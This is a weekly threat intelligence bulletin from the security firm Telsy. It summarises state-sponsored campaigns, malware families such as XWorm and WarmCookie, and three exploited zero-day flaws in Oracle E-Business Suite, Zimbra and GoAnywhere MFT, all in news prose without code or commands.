Telsy and Fortinet Collaborate for Quantum-Safe VPN

The benefits of security awareness: defending against phishing, social engineering, and related threats

 View all
Threat Intelligence, News

APTs between East and West, malware news, three 0-days exploited in malicious campaigns

Weekly Threats hor Telsy

APT: State-sponsored campaigns detected around the globe

This week, multiple campaigns by various state-sponsored adversaries were tracked worldwide. In Russia, the Sandworm subgroup known as Seashell Blizzard targeted critical infrastructure in Ukraine and Europe in the agricultural, defense, transportation, and manufacturing sectors. Using phishing emails, the attacker distributed XLL attachments with embedded ExcelDNA containing custom malware called CheapShot, which downloaded and launched a secondary payload named ShroudDoor. The Lunar Spider group, on the other hand, exploited fake CAPTCHAs to target the European financial sector, conveying the Latrodectus loader to gather information on the network, facilitating data theft, lateral movement, and the potential release of ransomware in collaboration with groups such as ALPHV Team and FIN6. Also in Russia, Cavalry Werewolf launched a targeted campaign against government agencies and companies in the country’s energy, mining, and manufacturing sectors. The adversary, posing as Kyrgyz government officials, delivered custom malware such as FoalShell and StallionRAT. Moving eastward, an alleged Chinese-linked cyberespionage campaign targeted a Serbian government department dealing with aviation, as well as other European institutions in Italy, Hungary, Belgium, and the Netherlands. Analysis revealed a connection to infrastructure associated with PlugX and files or artifacts linked to UNC6384, presumably associated with Mustang Panda. Finally, the Indian APT Dropping Elephant evolved its TTPs and conducted three spear phishing campaigns against Pakistan, exploiting weaponized Office documents, malicious LNK files, and malware families such as WooperStealer and the Python variant of a backdoor called AnonDoor. 

 

Malware: from new tools to the reappearance of some already known ones

In an active campaign called Water Saci, a malware nicknamed SORVEPOTEL was spread—mainly against financial institutions and cryptocurrency exchanges in the Brazilian market—characterized by its ability to propagate automatically on WhatsApp by sending malicious ZIP files to all contacts associated with the compromised account. Secondly, a Vietnamese group called BatShadow targeted job seekers and digital marketing professionals in order to spread a previously unknown malicious executable called Vampire Bot. The latter was designed to steal sensitive information, monitor activities, and maintain long-term access to infected systems. The well-known WarmCookie, still actively exploited, presents some new features. In its recent versions, handlers have been added to execute PE files, DLLs, and PowerShell scripts, as well as other evasion techniques and more robust synchronization mechanisms. Another innovation is the addition of a field called “campaign ID,” which allows attackers to track and differentiate various campaigns and distribution methods. Finally, the XWorm backdoor has reemerged in phishing campaigns in its 6.0, 6.4, and 6.5 variants, with over 35 supported plugins that extend its capabilities from stealing sensitive information to ransomware activities. 

 

0-day: Oracle, Fortra, and Zimbra vulnerabilities exploited

Three zero-day vulnerabilities were exploited in various malicious operations. Oracle released an advisory to fix CVE-2025-61882, a vulnerability affecting Oracle Concurrent Processing in Oracle E-Business Suite (EBS) — specifically in the BI Publisher Integration component — which was exploited in the extortion campaign attributed to TA505. The operation in question followed months of targeted intrusions, with exploitation activities beginning on August 9, 2025, and additional suspicious activity dating back to July 10. News of this vulnerability was first reported by Scattered Lapsus$ Hunters (SLH), which disclosed two files on Telegram on Friday, October 3, including a CVE exploit. According to the investigation, some of the artifacts observed in July match the exploit disclosed by SLH; however, there is insufficient evidence to confirm the cybercrime group’s involvement in the campaign. Zimbra, on the other hand, has fixed a zero-day vulnerability in Zimbra Collaboration Suite (ZCS) tracked with code CVE-2025-27915. The latter was used in attacks in early January, before the patch was released. Specifically, an attacker spoofed the Libyan Navy’s Office of Protocol in an email that delivered a zero-day exploit against a Brazilian military organization by spreading ICS files containing JavaScript code, i.e., a complete datastealer targeting Zimbra Webmail. It is currently unclear who is behind the attack, but similarities have been identified with the TTPs of Sofacy and Ghostwriter. Finally, the critical vulnerability CVE-2025-10035 in Fortra GoAnywhere MFT has been exploited as a zero-day since September 10 in activities attributed to the financially motivated group Storm-1175, known for distributing the Medusa ransomware.

 

 

Weekly Threats Report is Telsy’s weekly update on the latest developments regarding cyberattacks and threat actors worldwide, produced by our Threat Intelligence & Response team.

The team is made up of security analysts and researchers with both technical and investigative expertise, as well as recognized international experience.

Through continuous monitoring of cyber threats and geopolitical events, it produces and provides organizations with valuable information to anticipate attacks and understand their impact, while ensuring a reliable partner in the event of a cyber incident.

Discover more about our Cyber Threat Intelligence solution.